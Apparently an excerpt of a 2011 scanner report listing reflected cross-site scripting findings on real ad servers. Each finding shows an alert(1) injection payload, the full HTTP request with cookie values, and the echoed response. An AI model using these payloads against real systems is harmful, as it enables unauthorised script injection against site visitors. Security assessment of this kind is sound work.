Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 162f2'-alert(1)-'2597d4b27e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj162f2'-alert(1)-'2597d4b27e5/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:29 GMT
Connection: close
Content-Length: 7543

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-49028478_1304957069","http://ad.doubleclick.net/adj162f2'-alert(1)-'2597d4b27e5/q1.q.gc.6008/life;net=q1;u=,q1-49028478_1304957069,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;
...[SNIP]...
2.22. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e106e'-alert(1)-'9233dd66208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008e106e'-alert(1)-'9233dd66208/life;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:30 GMT
Connection: close
Content-Length: 7535

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-55945961_1304957070","http://ad.doubleclick.net/adj/q1.q.gc.6008e106e'-alert(1)-'9233dd66208/life;net=q1;u=,q1-55945961_1304957070,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net
...[SNIP]...
2.23. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0e95'-alert(1)-'968894bb131 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/lifee0e95'-alert(1)-'968894bb131;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:30 GMT
Connection: close
Content-Length: 7535

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-40265891_1304957070","http://ad.doubleclick.net/adj/q1.q.gc.6008/lifee0e95'-alert(1)-'968894bb131;net=q1;u=,q1-40265891_1304957070,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;o
...[SNIP]...
2.24. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec4cd'-alert(1)-'5eba76a46b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/life;sz=ec4cd'-alert(1)-'5eba76a46b5 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:29 GMT
Connection: close
Content-Length: 7491

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
net/adj/q1.q.gc.6008/life;net=q1;u=,q1-76679238_1304957069,11f8f328940989e,none,q1.polit_h-q1.none_m-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=ec4cd'-alert(1)-'5eba76a46b5;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=q1.ent_h;btg=q1.food_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h?","ec4cd'-a
...[SNIP]...
2.25. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4493f"-alert(1)-"ec76f37ce0d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341724493f"-alert(1)-"ec76f37ce0d&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:16 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
lider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341724493f"-alert(1)-"ec76f37ce0d&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300
...[SNIP]...
2.26. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d95e'-alert(1)-'1b149a4c24f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341726d95e'-alert(1)-'1b149a4c24f&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:21 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=86341726d95e'-alert(1)-'1b149a4c24f&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300
...[SNIP]...
2.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84156"-alert(1)-"67294489f15 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574984156"-alert(1)-"67294489f15&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:42 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
r minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574984156"-alert(1)-"67294489f15&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...
2.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82078'-alert(1)-'e5965931a94 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574982078'-alert(1)-'e5965931a94&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:46 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=27020574982078'-alert(1)-'e5965931a94&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Essc
...[SNIP]...
2.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 508a1"-alert(1)-"1b007082072 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596508a1"-alert(1)-"1b007082072&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:59 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596508a1"-alert(1)-"1b007082072&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...
2.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3932e'-alert(1)-'d56046cbb6f was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f5963932e'-alert(1)-'d56046cbb6f&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:06:03 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f5963932e'-alert(1)-'d56046cbb6f&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/
...[SNIP]...
2.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 888e8"-alert(1)-"2bd960de39e was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4888e8"-alert(1)-"2bd960de39e&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:51 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4888e8"-alert(1)-"2bd960de39e&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...
